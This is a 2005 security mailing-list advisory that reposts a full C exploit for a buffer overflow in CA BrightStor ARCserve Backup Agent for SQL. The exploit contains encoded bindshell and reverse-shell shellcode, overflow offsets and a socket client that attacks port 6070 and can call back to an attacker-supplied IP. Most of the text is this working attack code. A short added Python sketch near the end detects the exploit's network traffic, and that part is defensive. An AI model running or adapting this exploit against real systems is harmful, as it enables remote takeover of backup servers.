[EXPL] CA BrightStor ARCserve Backup Agent for SQL (Exploit)
From: SecuriTeam (support_at_securiteam.com)
Date: 08/18/05
To: list@securiteam.com Date: 18 Aug 2005 17:01:18 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
CA BrightStor ARCserve Backup Agent for SQL (Exploit)
------------------------------------------------------------------------
SUMMARY
Computer Associates International Inc's BrightStor ARCserve Backup
UniversalAgent allows attackers to execute arbitrary code. For more
information see our previously published article, CA BrightStor
ARCserve Backup Agent For MS SQL Server Buffer Overflow:
<http://www.securiteam.com/windowsntfocus/5LP0620GKI.html>. Provided below is
an exploit for the vulnerability in ARCserve Backup Agent for SQL.
DETAILS
Exploit Code:
/*
* CA BrightStor ARCserve Backup Agent for SQL - dbasqlr.exe
*
* cybertronic[at]gmx[dot]net
*
*/
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define PORT 6070
unsigned char bindshell[] =
"\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff\xff\xff\x81\x36\x80\xbf\x32"
"\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
"\x03\x53\x06\x1f\x74\x57\x75\x95\x80\xbf\xbb\x92\x7f\x89\x5a\x1a"
"\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09\xf9\x3a\x6b\xb6\xd7\x9f\x4d"
"\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6\xb3\x5a\xf8\xec\xbf\x32\xfc"
"\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf\xeb\xcd\xc2\x88\x36\x74\x90"
"\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad\xbe\x32\x94\x09\xf9\x22\x6b"
"\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81\xbf\x32\x1d\xc6\xab\xcd\xe2"
"\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81\xbf\x32\x1d\xc6\xa7\xcd\xe2"
"\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80\xbf\x32\x1d\xc6\xa3\xcd\xe2"
"\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80\xbf\x32\x1d\xc6\x9f\xcd\xe2"
"\x84\xd7\x96\x39\xae\x56\xda\x4a\x80\xbf\x32\x1d\xc6\x9b\xcd\xe2"
"\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80\xbf\x32\x1d\xc6\x97\xcd\xe2"
"\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80\xbf\x32\x1d\xc6\x93\x01\x6b"
"\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81\xbe\x32\x94\x7f\xe9\x2a\xc4"
"\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6\xa3\xb9\x4c\xd7\xe8\x5a\x96"
"\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3\x40\x64\xb4\xd7\xec\xcd\xc2"
"\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50\xd7\x57\xec\xe5\xbf\x5a\xf7"
"\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4\x32\x0e\xb0\xb3\x7f\x01\x5d"
"\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4\xaf\x76\x6a\xc4\x9b\x0f\x1d"
"\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4\x9b\x62\x19\xc4\x9b\x22\xc0"
"\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f\xc9\x02\xc5\x7f\xe9\x22\x1f"
"\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b\x77\x65\x6b\xd6\x93\xcd\xc2"
"\x94\xea\x64\xf0\x21\x8f\x32\x94\x80\x3a\xf2\xec\x8c\x34\x72\x98"
"\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89\x34\x72\xa0\x0b\x17\x8a\x94"
"\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80\xec\x67\xc2\xd7\x34\x5e\xb0"
"\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83\x6a\xb9\xde\x98\x34\x68\xb4"
"\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83\x4a\x01\x6b\x7c\x8c\xf2\x38"
"\xba\x7b\x46\x93\x41\x70\x3f\x97\x78\x54\xc0\xaf\xfc\x9b\x26\xe1"
"\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c\xf4\xb9\xce\x9c\xbc\xef\x1f"
"\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b\x6a\x6d\xca\xdd\xe4\xf0\x90"
"\x80\x2f\xa2\x04";
unsigned char reverseshell[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9"
"\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3"
"\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE"
"\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99"
"\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF"
"\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6"
"\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF"
"\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD"
"\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD"
"\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD"
"\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66"
"\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66"
"\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB"
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75"
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2"
"\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";
void
exploit ( int s, unsigned long cbip, unsigned short cbport, int option )
{
unsigned long pushesp = 0x20c0c1ab;
char buffer[3289];
bzero ( &buffer, sizeof ( buffer ) );
memset ( buffer, 0x41, sizeof ( buffer ) - 1 );
memcpy ( buffer + 1337, "\x81\xc4\x54\xf2\xff\xff", 6 );
memcpy ( buffer + 3168, ( unsigned char* ) &pushesp, 4 );
memcpy ( buffer + 3172, "\xe9\xd0\xf8\xff\xff", 5 );
if ( option == 0 )
{
memcpy ( &reverseshell[111], &cbip, 4);
memcpy ( &reverseshell[118], &cbport, 2);
memcpy ( buffer + 1343, reverseshell, sizeof ( reverseshell ) - 1 );
}
else
memcpy ( buffer + 1343, bindshell, sizeof ( bindshell ) - 1 );
printf ( "attacking with %u bytes...", strlen ( buffer ) );
write ( s, buffer, strlen ( buffer ) );
printf ( "done!\n" );
close ( s );
}
int
main ( int argc, char* argv[] )
{
int s;
unsigned long cbip;
unsigned short cbport;
struct sockaddr_in remote_addr;
struct hostent* host_addr;
if ( argc != 2 )
if ( argc != 4 )
{ fprintf ( stderr, "Usage\n-----\n[bindshell] %s \n[reverseshell] %s \n", argv[0], argv[0] ); exit ( 1 ); }
if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
{ fprintf ( stderr, "Cannot resolve hostname: %s\n", argv[1] ); exit ( 1 ); }
remote_addr.sin_family = AF_INET;
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
remote_addr.sin_port = htons ( PORT );
s = socket ( AF_INET, SOCK_STREAM, 0 );
printf ( "connecting to %s:%u...", argv[1], PORT );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{ printf ( "failed!\n" ); exit ( 1 ); }
printf ( "ok!\n" );
if ( argc == 4 )
{
cbip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;
cbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;
exploit ( s, cbip, cbport, 0 );
}
else
exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 );
}
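Detection note (an added example, not part of the original advisory or the author's code): the posted code sends one 3288-byte write to TCP port 6070, with a fixed 4-byte address at offset 3168 followed by a 5-byte backward jump, all padded with a repeated filler byte. The sketch below classifies a reassembled client-to-server payload on those traits. The function names, the 512-byte filler threshold and the premise that legitimate first messages are shorter than offset 3168 are assumptions to validate against real agent traffic.

```python
import struct

AGENT_PORT = 6070                          # "#define PORT 6070" in the posted code
RET_OFFSET = 3168                          # offset of the overwritten return address
RET_ADDR = struct.pack("<I", 0x20C0C1AB)   # "pushesp" value from the posted code
JMP_BACK = bytes.fromhex("e9d0f8ffff")     # 5 bytes the posted code writes at 3172
MIN_FILLER_RUN = 512                       # assumed tuning value, not from the page


def longest_run(data):
    """Length of the longest run of one repeated byte value."""
    best = run = 0
    prev = None
    for b in data:
        run = run + 1 if b == prev else 1
        prev = b
        best = max(best, run)
    return best


def classify(dst_port, payload):
    """Return the reasons a client->server payload resembles this overflow."""
    reasons = []
    if dst_port != AGENT_PORT:
        return reasons
    if len(payload) > RET_OFFSET:
        # Generic trait: survives changes to filler, address and payload.
        reasons.append("oversized")
        # PoC-specific traits: exact bytes at the exact offsets.
        if payload[RET_OFFSET:RET_OFFSET + 4] == RET_ADDR:
            reasons.append("poc-return-address")
        if payload[RET_OFFSET + 4:RET_OFFSET + 9] == JMP_BACK:
            reasons.append("poc-jump-back")
    if longest_run(payload) >= MIN_FILLER_RUN:
        reasons.append("filler-run")
    return reasons


def sample_payloads():
    """Constructed inputs: PoC-shaped buffer (no shellcode), small message, patterned blob."""
    poc = b"A" * RET_OFFSET + RET_ADDR + JMP_BACK + b"A" * 111
    benign = b"\x00\x10status"
    variant = bytes(range(256)) * 13
    return poc, benign, variant
```

Only the "oversized" reason still fires on the patterned blob, which is why a length rule on port 6070 is the durable control and the byte signatures serve only to confirm this particular posting.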
ADDITIONAL INFORMATION
The original article can be found at:
<http://www.livejournal.com/users/cybertronic/>